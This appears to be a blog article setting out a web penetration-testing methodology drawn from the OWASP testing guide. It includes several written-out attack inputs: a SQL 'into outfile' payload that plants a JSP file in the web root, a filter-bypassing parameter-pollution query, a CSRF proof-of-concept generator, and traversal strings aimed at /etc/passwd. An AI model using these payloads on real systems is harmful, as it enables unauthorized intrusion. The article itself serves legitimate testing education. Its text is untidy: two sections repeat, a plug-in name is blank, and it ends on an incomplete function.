OWASP Penetration Testing Cookbook

This article was written in Chinese and English with identical content. To view the Chinese version, please scroll down.

Penetration Testing

By accumulating testing experience, I have gradually established my own systematic testing methodology. This is a long article: a methodology distilled from the OWASP Web Security Testing Guide and nearly a year of penetration-testing experience. It contains few technical details and instead shares ideas about industry penetration testing. In my opinion, beyond the necessary techniques, it is more important for a senior penetration tester to have their own test matrix. Unlike vulnerability research and web attacks, I think the focus of penetration testing is to improve testing efficiency while ensuring high test coverage and verifying the security and independence of each component of the business system. I hope this helps colleagues who are new to penetration testing quickly establish their own testing framework.

Information collecting

How complete a test can be depends on how complete the collected information is. This lesson sinks in deeper with every test. In my view, it is not enough to collect complete information; you also need the ability to integrate that information into a picture of the whole system. During testing, every information point related to the relevant functions must be covered.

This is less necessary when testing internal business systems, since you will receive an asset report listing all the objects that need to be covered. But in red-team/blue-team exercises or hacking challenges, you need to focus on collecting things like leaked code and usernames, and sometimes you can dig up important documents, login interfaces, and so on. Use search operators such as `site:`, `intext:`, and `inurl:` to perform precise searches.
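These search operators are easy to script. A minimal sketch that only builds the query strings; the domain and keywords are placeholders, not from any real engagement:

```python
# Build a few common Google-dork query strings for reconnaissance.
# The keywords below are illustrative examples, not a complete dork list.

def build_dorks(domain):
    """Return dork queries scoped to one target domain."""
    return [
        f"site:{domain} intext:password",   # pages mentioning passwords
        f"site:{domain} inurl:login",       # login interfaces
        f"site:{domain} filetype:pdf",      # exposed documents
        f"site:{domain} intitle:index.of",  # open directory listings
    ]

for q in build_dorks("example.com"):
    print(q)
```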

Web server fingerprint

Identifying the framework a website uses narrows the scope of our attack. Some web middleware may have directly exploitable vulnerabilities due to outdated versions. In addition, knowing the web server and its characteristics helps later stages of the penetration test, for example when testing file-upload bypasses.

The most direct way to fingerprint a web server is to look at the `Server` field in the response headers. However, most vendors hide the web server banner for security reasons. In that case, several techniques can help:

  1. HTTP header field ordering: different web servers order header fields differently.
  2. Request a nonexistent page or trigger an error, and observe the response.
  3. Identification via scanners, online tools, and similar.
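Point 1 can be sketched as a simple lookup; the ordering table below is purely illustrative, not an authoritative fingerprint database:

```python
# Fingerprint a server by the order of its response headers.
# These orderings are hypothetical examples for illustration only.

SIGNATURES = {
    ("Date", "Server", "Content-Type"): "Apache-like",
    ("Server", "Date", "Content-Type"): "IIS-like",
}

def guess_server(header_names):
    """Match the first three header names against known orderings."""
    key = tuple(header_names[:3])
    return SIGNATURES.get(key, "unknown")

print(guess_server(["Date", "Server", "Content-Type", "Content-Length"]))
# Against a live target, header_names could be collected with http.client:
#   conn = http.client.HTTPSConnection("example.com")
#   conn.request("HEAD", "/")
#   names = [k for k, v in conn.getresponse().getheaders()]
```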

Web server metafile

robots.txt lists the directories that crawlers are forbidden to access. The testing guide only covers the information disclosed by the existence of robots.txt, but I think there is more to discover here: leaks of other sensitive files can be just as deadly. Packaged, downloadable front-end source code has turned up many times, and downloading the code for audit is like catching the application with no clothes on. You can also look for cookie-generation rules in the front-end JS code; comments may contain hard-coded passwords; and internal IPs, emails, accounts, and other information written into the code during testing may still be present. These issues mostly occur in small companies and small projects; large-scale web applications generally do not have them. In addition, files such as sitemap.xml, .DS_Store, and crossdomain.xml can also expose sensitive information.

In penetration testing, these tasks are generally handed to a scanner. For sites that cannot be scanned, you can use a fuzzing dictionary for targeted testing.
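A minimal sketch of the fuzz-dictionary approach; the wordlist here is a tiny illustrative sample, not a real fuzzing dictionary:

```python
# Generate candidate URLs for common metafiles and development leftovers.
from urllib.parse import urljoin

WORDLIST = ["robots.txt", "sitemap.xml", ".DS_Store", "crossdomain.xml",
            ".git/HEAD", "backup.zip"]

def candidate_urls(base):
    """Join each wordlist entry onto the target base URL."""
    return [urljoin(base, path) for path in WORDLIST]

for url in candidate_urls("https://example.com/"):
    print(url)
# Each URL would then be requested (e.g. with urllib.request), and any
# response other than 404 flagged for manual review.
```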

Enumerate web server applications

Explore all applications running on the web server as thoroughly as possible. The same IP address may map to different web applications depending on the domain name. I remember a Hack The Box machine that used virtual hosting: you had to edit the hosts file and bind another domain name to the IP to reach the vulnerable web application.

The same IP may also resolve to different web applications depending on the URL.

For hidden web applications like these, if directory browsing is not possible, you can only hope that a crawler or scanner finds them, or search Google with site:www.example.com.

For web servers with multiple open ports, use tools such as Nmap to scan all ports, in case the vendor has placed sensitive entry points on high ports, which are otherwise hard to find.

For web servers using virtual hosts, you can find hidden web applications by querying DNS records or doing reverse IP lookups; online tools suffice.

Identify application entry points

According to the testing guide, this step means intercepting requests with Burp to enumerate the parameters passed into the application. In practice, some parameters are framework parameters that appear in almost every request; their names may be symbols or abbreviations. Test these frequently occurring parameters first. This saves a great deal of time across the whole test, clarifies what these parameters mean, and avoids the situation where, faced with many parameters, you do not know which one to test.

Map the execution path of the application

When testing a huge web application, full coverage of the code base is hard to achieve; you can only try to exercise as much code as possible. The testing guide summarizes three ways to improve code coverage: path, data flow, and race conditions.

From a black-box perspective, all we can see is the path in the URL. When you first get an application, it is best to open a spreadsheet or structured notepad and record the paths that look problem-prone. Yesterday I found an unauthorized-access issue on an API endpoint during testing; I suspect it is a common pattern, but because I had not recorded the path at the start, finding it again was painful. Also, when recording a path or API, be sure to note its entry link; otherwise, by the time vulnerabilities are found at the end, you will have completely forgotten where you came from.

Identify web application framework

As with identifying the web server, once you know the application framework you can start from a library of known vulnerabilities and go through them first. Because of business constraints, some spots cannot be patched according to the fix recommendations the framework vendor provides and are instead patched by the web application vendor itself; omissions are inevitable. If something feels off during testing, try to bypass it.

As for identifying web application frameworks, one way is experience: a tester who has seen many frameworks can tell from a page or an error message. Sometimes vendors deliberately hide the framework's characteristics; in that case, online tools can help with identification.

Tools

  • netcraft. An online tool for identifying basic information about a web server and its pages: "What's that site running?"

  • Nmap. Scans ports to determine services and versions; consult the manual for the right parameters.

  • BurpSuite. Nothing more to say; since 2.0, chaining it with sqlmap and Xray is very convenient.

  • WhatWeb. Identifies web applications. "WhatWeb - next generation web scanner."

  • BlindElephant. Identifies versions by checksumming static files that differ between releases, so its accuracy is very high.

Configuration management test

In bug bounty hunting (SRC), configuration testing is rarely involved. But at work, the security of the configuration must be verified before a business system goes live. The point here is to verify, from the vendor's perspective, whether the configuration of the product to be launched is safe. This involves an important security principle: security must not rest on a single layer. For example, suppose my web application has a SQL injection vulnerability but the front end is protected by a WAF; the attacker appears unable to harm the application, but this is in fact unsafe. It is like a series circuit: if any one segment breaks, the bulb cannot light. Migrating this idea from the web application layer to the web server and network configuration layer: you cannot rely solely on web application security to protect the server; the server itself must be configured correctly to maximize security.

Network and Infrastructure

First identify all components and ensure that none of them, nor the systems used to manage them, have known vulnerabilities. Strictly control access to these components and maintain a list of the ports each application requires.

Testing the server directly is difficult; automated tools or scripts are generally used. Be cautious with these tools, as they may cause downtime or denial of service. The same applies to web testing. Automated tools produce both false negatives and false positives when fingerprinting the web server: false negatives occur when administrators delete or obfuscate version information to hide server details, so the tool cannot correctly detect the component version; false positives occur when administrators have patched known vulnerabilities but not updated the web server's version string.

As a tester, scanning is the usual approach when testing hosts; the reports mostly list weak cipher suites, support for old protocol versions, and so on. False-negative vulnerabilities are hard to detect. Here again, security must not depend on a single safeguard: developers and operations staff should follow secure configuration rules for servers, operations staff should patch newly announced vulnerabilities promptly, and nobody should rely solely on penetration testing to find vulnerabilities.

Application platform configuration

Web applications may still contain leftover demo and test pages, or configurations set up for convenience in the test environment, including but not limited to concurrent logins on the same account and universal passwords or verification codes.

Black-box testers have no configuration guide, so this testing is somewhat blind. Based on the OWASP testing guide and my own experience, I summarize:

  • Send malformed parameters such as negative values or characters to check whether Debug mode is disabled.

  • Continue sending malformed parameters and request nonexistent files, and confirm the returned pages contain no error details.

  • Check the logs: are all create, delete, and update operations recorded, and is the separation-of-duties principle (admin, auditor, user) followed?

  • Middleware configuration files and website configuration files must not be accessible.

  • Examine any odd-looking functions in the admin panel.
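The first two checks can be partly automated by recognizing debug output in responses. A sketch; the patterns below are common illustrative examples, not a complete list:

```python
# Flag response bodies that look like debug/stack-trace output.
import re

DEBUG_PATTERNS = [
    r"Traceback \(most recent call last\)",  # Python traceback
    r"at [\w.$]+\([\w.]+\.java:\d+\)",       # Java stack frame
    r"Fatal error: .* on line \d+",          # PHP fatal error
]

def looks_like_debug(body):
    """True if the body matches any known debug-output pattern."""
    return any(re.search(p, body) for p in DEBUG_PATTERNS)

print(looks_like_debug("Traceback (most recent call last):\n  File ..."))  # True
print(looks_like_debug("<html>Page not found</html>"))                     # False
```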

Logs

The importance of log files is self-evident. The recording, management, and storage of logs in web applications must be tested.

First, log files must not reveal sensitive information. Related to this is the encryption of logged information: whether the encryption algorithm is reliable must also be considered here.

Is the log accessible only to log auditors? Is the log undeletable? Who audits the audit log's own records? The separation-of-duties principle raises many such questions.

Is the log stored on a dedicated log server? Is a maximum storage limit set, and what happens when that limit is reached?

Sensitive files

Sensitive files left behind when an application goes live after development, or not fully cleaned up after an update, lead to leaks: server configuration files, or even source code. When testing, rely on (1) experience, (2) scanners, (3) occasional finds in comments (though scanners now also scan comments for sensitive content), and (4) Google hacking. Sometimes, even though sensitive files have been deleted, their former locations remain in the Google Hacking Database because of their earlier existence, and similar files can be inferred from them.

HTTP method test

Other HTTP methods may cause security issues for web applications:

  • The PUT method allows attackers to upload files to the server; the classic example is the IIS PUT vulnerability.
  • The DELETE method allows an attacker to delete files on the server.
  • CONNECT allows an attacker to use the web server as a proxy.
  • TRACE was initially considered harmless, but was later found usable for cross-site tracing (XST).

When testing, send an OPTIONS request to see which methods are supported, or try them one by one. Note that some frameworks allow HEAD in place of GET, which can bypass role-based access control. GET and POST should likewise both be tested for access-control bypasses.
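A small sketch of the OPTIONS-based check; note that a real test should still try each method individually, since the Allow header cannot be fully trusted:

```python
# Parse an Allow header and flag methods that often cause trouble.
RISKY = {"PUT", "DELETE", "CONNECT", "TRACE"}

def risky_methods(allow_header):
    """Return the dangerous methods advertised in an Allow header."""
    advertised = {m.strip().upper() for m in allow_header.split(",")}
    return sorted(advertised & RISKY)

print(risky_methods("GET, HEAD, POST, TRACE, OPTIONS"))  # ['TRACE']
# Against a live target, the header would come from an OPTIONS request,
# e.g. via http.client; do not rely on it alone.
```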

Most vendors now enforce HTTPS; test whether plain HTTP can still be used.

Identity Management Test

Identity management here does not specifically mean rights management; it refers to the management-related tests involved in the user registration process.

Registration

Well-known web application registration functions can be roughly divided into several types:

  • Back-office registration; the registration interface is not public
  • Invitation-code registration, such as Hack The Box
  • Mobile number/email registration
  • Account/password registration

For penetration testing, the first type, back-office registration, is not within our scope, or at least not within the scope discussed in this section. The weak passwords and leftover test credentials involved in this kind of registration can be covered in the later authentication tests.

With invitation-code registration, the main issue is the security of the invitation code. Can it be guessed? Can it be reused? What is the process for obtaining it? If the invitation code encodes the permissions the registered user will have, the stakes are obvious; if it only verifies that the user is eligible to register and does not determine user permissions, its security should be discussed together with the next two types.

Registration by mobile number, email, or even social platform is the most popular method today. Unlike the previous two, it is open to anyone. Testing mainly focuses on the following:

  • Can the same user/identity register multiple times?
  • Can users be registered with multiple permission levels?
  • Is the entered email address/mobile number actually verified?

As for account/password registration, it is similar to the third type, except that accounts are either issued by the system or entered by the user. For system-issued accounts, pay attention to randomness and unpredictability (depending on the situation); for user-entered accounts, verify uniqueness and conformance to a unified format.

Account enumeration

During testing, horizontal privilege-escalation bugs usually involve collecting other users' identity identifiers, such as UIDs. For a web application, any sensitive parameter used to identify users should in principle be hard to enumerate. For example, WeChat user IDs are very complex and hard to enumerate; interested readers can look into them.

As a tester, you can use the following methods to try to collect user IDs

  • Web application responses. When sending an HTTP request, change the UID and observe whether the response stays consistent, or whether it states that the user does not exist. The differences can also show up as error pages or status codes such as 404/403/200.
  • Collection from URIs. Some web applications use routing, so UIDs are visible in the URI. Look for places where other users appear, such as friend lists, follower/fan lists, and comment sections.
  • Pattern inference. Register multiple users to infer how usernames are generated; timestamps and registration details are usually involved.
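The response-comparison idea in the first point can be sketched as follows, using canned (status, body) pairs instead of live requests:

```python
# Detect account enumeration: if responses for different UIDs are
# distinguishable, the application leaks whether an account exists.
# The probe responses below are made-up examples.

def enumerable(responses):
    """True if distinct UIDs produce distinguishable responses."""
    signatures = {(status, "not exist" in body) for status, body in responses}
    return len(signatures) > 1

probes = [
    (200, "Welcome back"),         # response for an existing user
    (200, "User does not exist"),  # response for a missing user
]
print(enumerable(probes))  # True: account existence is leaked
```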

Authentication test

Authentication means confirming that the claimed identity of a person or entity is genuine and credible. In network security, authentication is the process of verifying the digital identity of a communication initiator; login is the simplest example. For security personnel, testing authentication means understanding the authentication scheme and testing whether vulnerabilities or policy flaws can be used to bypass it.

Transmission test

Today, every web application launched by a large vendor should enforce HTTPS. In black-box testing, we mainly focus on how data is transmitted: for example, when the username and password are entered on the login page, are they forcibly sent over HTTPS via a POST request?

First, it must be an HTTPS request, to prevent the man-in-the-middle (MITM) attacks seen so often in textbooks. Nobody wants to sit in a coffee shop, get spoofed by the hacker at the next table, visit an HTTP website, and have all their traffic run naked across the hacker's machine. This precaution should not be underestimated: nobody pins the gateway to a specific address once they leave home or the office, and ARP spoofing is always hard to prevent.

Second, why use POST rather than GET? Although HTTPS encrypts the data in GET requests too, the URLs of GET requests are routinely written to log files, and access logs are generally stored in plain text, which increases the risk of sensitive information leaking.

Finally, verify that the Referer is also an HTTPS page; otherwise an SSL-stripping attack is possible.

Account password test

First, password strength. A typical web application with a registration function requires more than 8 characters including numbers, letters, at least one uppercase letter, and special characters. For black-box testing, check the password rules wherever account passwords are created.
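As one sketch, the rule described above (8+ characters, digits, lowercase, uppercase, and a special character) can be encoded as a check; the exact policy is an assumption and varies per application:

```python
# Check a password against an assumed complexity policy:
# length >= 8, at least one digit, lowercase, uppercase, and special char.
import re

def strong_enough(pw):
    return bool(len(pw) >= 8
                and re.search(r"\d", pw)
                and re.search(r"[a-z]", pw)
                and re.search(r"[A-Z]", pw)
                and re.search(r"[^0-9a-zA-Z]", pw))

print(strong_enough("Passw0rd!"))  # True
print(strong_enough("password"))   # False
```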

Then weak passwords. During development, developers often log in with an easy-to-type password; some web applications require a verification code at login, and developers may leave a universal code for convenience. The goal of our test is to find these possible weak credentials. Also: do new users created by the administrator get a default password, and is a password change forced on first login?

Another angle is lockout: how long is the account locked after too many wrong password attempts? The specific policy depends on the sensitivity of the application, but there should be no doubt that such a mechanism must exist to prevent brute-forcing.

Authentication bypass

Here we only discuss bypassing authentication functions; issues such as Broken Access Control are not covered here. The most common login-box bypass is SQL universal-password injection. In ancient times there were also pages that did no login check at all: post-login display pages that could be reached simply by typing the URL into the browser. Some applications still mark login state via parameters with names like "authorized"; some developers are clever enough to rename these fields or move them into the cookie, thinking that makes them hard to find. In practice, they break the moment you touch them.

Authorization test

This authorization test does not mean your test is authorized; it means testing the authorization itself. I actually think "what-you-can-do testing" would be a better name, but it is what the OWASP guide calls it, so I kept it.

Directory traversal/file inclusion

To find such test points during black-box testing, the main concerns are:

  • Are there request parameters used for file operations?
  • Are there unusual file extensions?
  • Are there interesting variable names?
  • Can you determine that the web application generates page content dynamically from cookies?

In CTF challenges, we often see directory traversal, or file inclusion needed for the final RCE, but in real tests these are rare finds: such simple, easy-to-exploit vulnerabilities are hard to come across on the public network. So while watching the URL, also watch the API endpoints. Front-end/back-end interaction now commonly uses JSON, XML, and so on, and the parameters in that data may also be file identifiers; paying extra attention to these places can bring unexpected gains. It is a bit like the cookie-driven dynamic page generation in the last bullet: essentially, the file identifier is written into the cookie.

Of course, there are techniques to this testing. You need to be familiar with the web environment and construct different payloads for different servers and middleware. There is another interesting vulnerability here, called relative path overwrite (RPO); my classmate Tianshi wrote an article explaining it very clearly.

Exploration of RPO attack methods-FreeBuf network security industry portal

In a WeChat mini-program I tested a few days ago, uploaded images were stored on a dedicated file server and the storage address was included in the response. Following up, I found a directory traversal. My feeling is that directory traversal just takes care: there is no deep technique, and you can always find it if you look closely.
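Constructing traversal payloads for different servers/middleware, as mentioned above, is easy to script; the encodings below are common textbook variants, not an exhaustive list:

```python
# Generate directory-traversal payload variants for a target path.
# The target file and depth are illustrative defaults.

def traversal_payloads(target="etc/passwd", depth=3):
    prefixes = [
        "../" * depth,      # plain traversal
        "..%2f" * depth,    # URL-encoded slash
        "..%252f" * depth,  # double URL-encoded slash
        "..\\" * depth,     # Windows-style backslash
    ]
    return [p + target for p in prefixes]

for payload in traversal_payloads():
    print(payload)
```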

Authorization bypass

Can a function still be used after the account logs out? If simultaneous logins are supported, can a function still be used on one PC after the account has logged out on another? Are you redirected when denied access to a high-privilege page, or does the front end leak information? Can the API be used without authorization?

There are many issues with that last API point, and it takes good development practice to avoid them. I tested a system two weeks ago: in the initial test I reported an unauthorized-API issue; on retest, the reported API had been fixed, but other APIs were still unauthorized. When such problems are found, it is best to audit the APIs together with the developers and adopt one unified set of authentication logic.

There are many ways to bypass permission checks: at the most basic, replacing IDs or parameters, or switching the HTTP method from POST to GET.

There are also logic flaws: for example, a change-password or registration flow split across pages 1 to 5, where you can type page 4 directly into the address bar and skip page 3 entirely.

Privilege escalation

According to the separation-of-duties principle, a business system is divided among administrators, auditors, and users; unauthenticated users can also count as a role. When testing, enumerate all roles of the specific business system and sort out the functions each can use. For example, every company has a customer-service hotline. Such calls are not answered on someone's mobile phone; they go through a customer-service telephone system and are distributed to salespeople. Can you imagine what roles this business system has? The administrator and log auditor from the separation-of-duties model must exist, and the user role splits in this scenario. First, the front-desk operators: they should not be able to view users' personal data or details of the equipment users ask about; they only listen to the user's need and transfer the call to the right salesperson, so they should be able to view the extension numbers and information of all salespeople. A specific salesperson, after taking a customer's call, should be able to view the customer's information and the business equipment his department is responsible for, but not other departments'.

Another example: how many roles should an SRC (vulnerability-reporting) platform have? Start from the separation-of-duties principle, and split users into two kinds: enterprises and white hats. White hats can submit vulnerabilities to the corresponding companies but can only view their own submissions, plus some public information about other white hats. Companies can view all vulnerabilities related to themselves, but not their competitors'. There are also unauthenticated users, who cannot view white-hat information but can browse some public content, and so on.

And so on: the core idea is to clarify each system's roles and functional boundaries, then test them.

During testing, note that "invisible" does not mean "not accessible without authorization". You may be able to reach a page meant only for high-privilege users simply by typing its URL. Operations high-privilege users perform on those pages, such as refreshing, editing, or liking, may also leak information through unauthorized access, so be careful.

Session management test

The core component of any web application is the mechanism used to control and maintain the state of interaction between the website and its users. This mechanism is session management, which intuitively means cookies and sessions. In a penetration test, obtaining a cookie is equivalent to obtaining the account. A modern high-security system will prevent this; substituting another user's cookie can be classed as a cookie-reuse (unauthorized access) vulnerability. But in the vast majority of small and medium public-network systems, logging in by substituting a cookie still works widely, so cookie security is very important.

Bypassing the session management schema

Information such as the user ID, permission flags, and tokens is stored in the cookie, usually encrypted by some algorithm. First, check the front-end JS code for leaks of the cookie-generation logic; a scan can turn it up. Failing that, you can try collecting many cookies to find a pattern for brute-force attacks, but this method is strongly discouraged: the efficiency is far too low, and I think it is completely unnecessary in routine, heavy penetration testing.

Another angle: although every transmitted packet carries cookies, cookie validation is oddly implemented in some places, and deleting the cookie may also lead to a bypass.

Cookies in packets must be transmitted encrypted; unencrypted, their security is close to zero. A special case is a random user ID of more than 8 digits in the cookie, with the back end authorizing by that ID.

Chrome has a plug-in called EditThisCookie (https://chrome.google.com/webstore/detail/editthiscookie/fngmhnnpilhplaeedifhccceomclgfbg/related?hl=en-US) for viewing cookie attributes. Taking CSDN as an example, you can modify the value of each key in the cookie at the top, and check below whether several key attributes have been set. The cookie shown here is from a logged-out session.

The Secure attribute tells browsers to attach the cookie only when the request goes over an HTTPS channel, preventing plaintext transmission. The HttpOnly attribute helps prevent XSS from stealing cookies by forbidding client-side scripting languages such as JS from reading them. The Domain attribute should be set to the specific server that needs to receive the cookie, not an entire second- or third-level domain. The Expires attribute controls the cookie's lifetime and should be set to a reasonable range.
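A minimal sketch that checks a Set-Cookie header for the attributes just discussed; the header value is a made-up example:

```python
# Report which recommended attributes are missing from a Set-Cookie header.

def missing_flags(set_cookie):
    """Return the names of absent attributes: secure, httponly, expiry."""
    low = set_cookie.lower()
    wanted = {
        "secure": "secure" in low,
        "httponly": "httponly" in low,
        "expiry": "expires=" in low or "max-age=" in low,
    }
    return sorted(k for k, present in wanted.items() if not present)

hdr = "sessionid=abc123; Path=/; HttpOnly"
print(missing_flags(hdr))  # ['expiry', 'secure']
```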

Session fixation test

When the application does not issue a new session cookie after successful authentication, an attacker can exploit session fixation: force the victim to log in with a cookie the attacker already knows. Since the cookie does not change on successful login, the victim's session is effectively handed to the attacker. During testing, check whether the cookie changes before and after a successful login.
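The before/after comparison can be sketched trivially; the cookie values below are placeholders:

```python
# Session fixation check: the session identifier should be reissued
# upon successful authentication.

def fixation_suspected(pre_login_cookie, post_login_cookie):
    """True if the session cookie is unchanged across login."""
    return pre_login_cookie == post_login_cookie

print(fixation_suspected("sess=abc123", "sess=abc123"))  # True: suspicious
print(fixation_suspected("sess=abc123", "sess=zz999x"))  # False: reissued
```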

CSRF

CSRF vulnerabilities are also caused by improper session management. I will not introduce the principle of CSRF here; look it up if you are unfamiliar with it. In real testing, focus on whether core functions have CSRF: change password, reset password, transfer, purchase, delete, add, and so on. This is a tedious process. You cannot just check whether a Referer field appears in the packet, because applications are built by teams, different programmers own different modules, and their levels of secure development differ: some programmers simply never validate the Referer field.

Here is my own heuristic. During a penetration test, whenever I start a new function or module, I first try SQL injection and XSS. Modules written by security-conscious programmers use parameterized SQL queries and front-end escaping against XSS; for such a module, I verify one or two CSRF points, and if the Referer is validated, I assume the module has no CSRF. For modules that rely on weaker defenses such as SQL keyword filtering or XSS blacklists, I test every point for CSRF. This heuristic does not improve the accuracy of CSRF detection, but it greatly improves the efficiency of the overall test.

CSRF can exist in any GET/POST request, and JSON-format data can also carry CSRF; I wrote another article on this: [CSRF Attack in JSON Context](https://ama666.cn/2021/02/08/JSON%E6%83%85%E6%99%AF%E4%B8%8B%E7%9A%84CSRF%E6%94%BB%E5%87%BB/#more). Use BurpSuite's integrated CSRF PoC generator to quickly produce test PoCs.
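A minimal sketch of what such a PoC generator produces; the target URL and field names are placeholders, and this is not Burp's actual output:

```python
# Generate a minimal auto-submitting CSRF proof-of-concept page.

def csrf_poc(action, fields):
    """Build an HTML page that POSTs the given fields to `action`."""
    inputs = "\n".join(
        f'  <input type="hidden" name="{k}" value="{v}">'
        for k, v in fields.items()
    )
    return (f'<form id="f" action="{action}" method="POST">\n{inputs}\n</form>\n'
            '<script>document.getElementById("f").submit();</script>')

print(csrf_poc("https://example.com/password/change",
               {"new_password": "attacker-chosen"}))
```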

Session fixation testing

When an application does not refresh the session cookie after a user successfully authenticates, an attacker may exploit a session fixation vulnerability: the victim is forced to log in with a session cookie the attacker already knows. Since the cookie does not change on successful login, the attacker’s copy of it now identifies the victim’s authenticated session. During testing, check whether the session cookie changes before and after a successful login.
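
A minimal sketch of this check, assuming the cookie names below (common framework defaults, adjust to whatever the target actually sets) and that you have captured the cookie jars before and after login:

```python
# Common default session cookie names (PHP, Java, Django); illustrative only.
SESSION_COOKIE_NAMES = ("PHPSESSID", "JSESSIONID", "sessionid")

def session_fixation_risk(pre_login: dict, post_login: dict,
                          names=SESSION_COOKIE_NAMES) -> bool:
    """True if any session cookie kept the same value across login."""
    return any(
        name in pre_login and pre_login[name] == post_login.get(name)
        for name in names
    )
```

If this returns True, the cookie captured before authentication still identifies the logged-in session, which is the precondition for session fixation.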

CSRF

CSRF vulnerabilities are also caused by improper session management. I won’t cover the principle of CSRF here; if you are unfamiliar with it, look it up first. In actual hunting, focus on whether CSRF exists at core functions: change password, reset password, transfer, purchase, delete, add, and so on. This is a tedious process, and you cannot judge it merely by whether the request carries a Referer header. Many applications are built by teams, different programmers own different modules, and their secure-development skills vary; some programmers never validate the Referer header at all.

Here is my rule of thumb. Whenever I start testing a new function/module, I first try SQL injection and XSS. Programmers with strong security habits use parameterized SQL queries and front-end escaping against XSS. For a module written by such a programmer, I verify one or two potential CSRF points; if the Referer is validated there, I assume the module has no CSRF. For modules that rely on weaker defenses such as SQL keyword filtering or XSS blacklists, I test every potential CSRF point I can find. This heuristic does not improve the accuracy of CSRF detection, but it greatly improves the efficiency of the overall penetration test.

CSRF can exist in every GET/POST request, and JSON-format data can carry CSRF too; see another article of mine, [CSRF Attack in JSON Context](https://ama666.cn/2021/02/08/JSON%E6%83%85%E6%99%AF%E4%B8%8B%E7%9A%84CSRF%E6%94%BB%E5%87%BB/#more). BurpSuite’s integrated CSRF PoC Generator can quickly produce test PoCs.
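
Besides Burp’s generator, a PoC of the kind it emits can be sketched by hand; the endpoint URL and field names below are placeholder assumptions:

```python
import html

def csrf_poc(action_url: str, fields: dict) -> str:
    """Build an auto-submitting HTML form, the classic CSRF proof of concept."""
    inputs = "\n".join(
        f'    <input type="hidden" name="{html.escape(k)}" value="{html.escape(v)}">'
        for k, v in fields.items()
    )
    return (
        '<html><body onload="document.forms[0].submit()">\n'
        f'  <form action="{html.escape(action_url)}" method="POST">\n'
        f"{inputs}\n"
        "  </form>\n"
        "</body></html>"
    )

# Hypothetical password-change endpoint, for illustration only
poc = csrf_poc("https://victim.example/user/changepw", {"newpass": "attacker123"})
```

Host the generated page anywhere, have the logged-in victim open it, and watch whether the state-changing request succeeds without a valid Referer.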

Input verification test

The first thing I heard while learning penetration testing was “all input is unsafe”. It is a classic maxim and the mindset to keep throughout a test: SQL injection, XSS, file upload, RCE and the rest all stem from user input. This section summarizes how to find vulnerabilities quickly and accurately across the many functions that accept input.

XSS

XSS is probably the vulnerability you see most often in penetration testing, and there is nothing unusual about how to test for it: if the front end escapes output, move on; if it filters, fuzz the filter. What matters more is coverage: try XSS anywhere you get a chance to write into HTML, not just comment sections but uploaded image/file names and all sorts of unexpected places. The strangest XSS I have seen was in a scheduling bulletin board. The edit request for a bulletin carried a key named class (presumably meaning “category”), so I put an XSS payload in its value. After sending it, nothing fired on that page; I could not even find where the value echoed. But when I stepped back to the page listing all bulletin titles, the XSS fired, and viewing the source (F12) showed that the class value was inserted into that page’s HTML.

For more automated XSS testing, I recommend pairing Burp with Xray; the passive scanner led by P Niu is genuinely easy to use. The drawback is that it injects hundreds of XSS payloads, which can make later testing of the same function a little troublesome.

HTTP method tampering

Of the HTTP/1.1 request methods listed below, everything except the first entry should be disabled wherever possible.

  • GET, POST: the methods normal business functions rely on
  • OPTIONS: queries the supported HTTP methods; running it against different directories may yield different results
  • PUT: allows uploading files to the server
  • DELETE: allows deleting files on the server
  • TRACE: can traverse firewalls and proxies; intended for loopback diagnosis
  • CONNECT: reserved by HTTP/1.1; turns the connection into a tunnel through a proxy server, usually for passing SSL-encrypted traffic through an unencrypted HTTP proxy

In most cases dangerous HTTP methods can be found directly by a scanner, whose coverage is certainly wider than a human’s. When a business system requires login to reach certain paths and the scanner does not support authenticated scanning, those post-login directories must be tested manually.
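
For manual checks, a quick way to triage what an OPTIONS probe returns is to flag the methods from the list above (the Allow header string is the input; everything else is a sketch):

```python
# Methods from the list above that should normally be disabled
DANGEROUS_METHODS = {"PUT", "DELETE", "TRACE", "CONNECT"}

def risky_methods(allow_header: str) -> list:
    """Parse an 'Allow:' header value and return the dangerous methods it advertises."""
    advertised = {m.strip().upper() for m in allow_header.split(",") if m.strip()}
    return sorted(advertised & DANGEROUS_METHODS)
```

For example, an Allow header of "GET, POST, OPTIONS, PUT, TRACE" flags PUT and TRACE for follow-up testing.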

HTTP parameter pollution

Giving multiple HTTP parameters the same name may make an application behave in unpredictable ways. This once affected ModSecurity’s SQL injection core rule set: the filter correctly blocks the string select 1,2,3 from table, so a GET request carrying it in the URL is filtered. But by submitting several inputs with the same name, an attacker can build a URL such as http://domain/?query=select 1&query=2,3 from table that does not trigger the filter, while the application layer reassembles the fragments into the complete SQL query.

Different languages and middleware handle same-named parameters differently: some concatenate the values with a separator such as a comma, some take only the first occurrence, and some only the last.
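
The recombination above can be reproduced offline with Python’s standard query-string parser, which keeps every duplicate value (the comma-joining backend is an assumption standing in for behavior like classic ASP’s):

```python
from urllib.parse import parse_qs

# Each fragment on its own passes a naive keyword filter...
qs = "query=select 1&query=2,3 from table"
params = parse_qs(qs)          # {'query': ['select 1', '2,3 from table']}

# ...but a backend that joins duplicates with a comma reassembles
# the full injection at the application layer:
joined = ",".join(params["query"])   # 'select 1,2,3 from table'
```

This is why the filter layer and the application layer must agree on how duplicates are parsed.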

SQL injection

Everyone is familiar with SQL injection; it is usually the first vulnerability you learn in security and one of the most frequently discussed. It was rampant in the early days, and while growing security awareness has reduced the number of SQL injection vulnerabilities, they still exist. I will not elaborate on the principle or on specific testing and bypass techniques; what you can find online is more than enough. This section only covers experience in locating SQL injection and ways to improve efficiency.

When you get a business system, first become familiar with its request parameters. Just as a code audit starts from the installation files and routes, black-box testing cannot see the code but can see parameters that appear in almost every request, or in most of them. Try SQL injection on these parameters first, so you can skip them when they recur later. Then look for the inconspicuous parameter points that interact with the database, and do not let a single request go unexamined.

I recommend a BurpSuite plug-in that links to SQLmap; sending a request straight to SQLmap and letting it run is very efficient. The name of the plug-in is ``.

Also, second-order injection is a point that is easily overlooked; it must be analyzed in the context of the specific business system.

If a SQL injection exists, the database user has file-write permission, and single quotes are not escaped, you can write files with select * from table into outfile '/tmp/file'. This serves as an extra technique to capture a query result or drop a file. For example, against the web server’s directory you can execute 1 limit 1 into outfile '/var/www/root/test.jsp' FIELDS ENCLOSED BY '//' LINES TERMINATED BY '\n<%jsp code here%>'; which creates a file, with the MySQL user’s permissions, containing the following:

//field value//
<%jsp code here%>

load_file is a function that reads a local file; if the user has file-read permission, it can be used to read files.

As for single quotes, MySQL offers standard ways to avoid them. Suppose you want to match the Password field with password like 'A%': you can write the pattern as a hex literal, password like 0x4125, or as password like char(65, 37).
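
Both quote-free encodings can be generated mechanically; here is a small helper sketch, assuming ASCII input:

```python
def to_mysql_hex(s: str) -> str:
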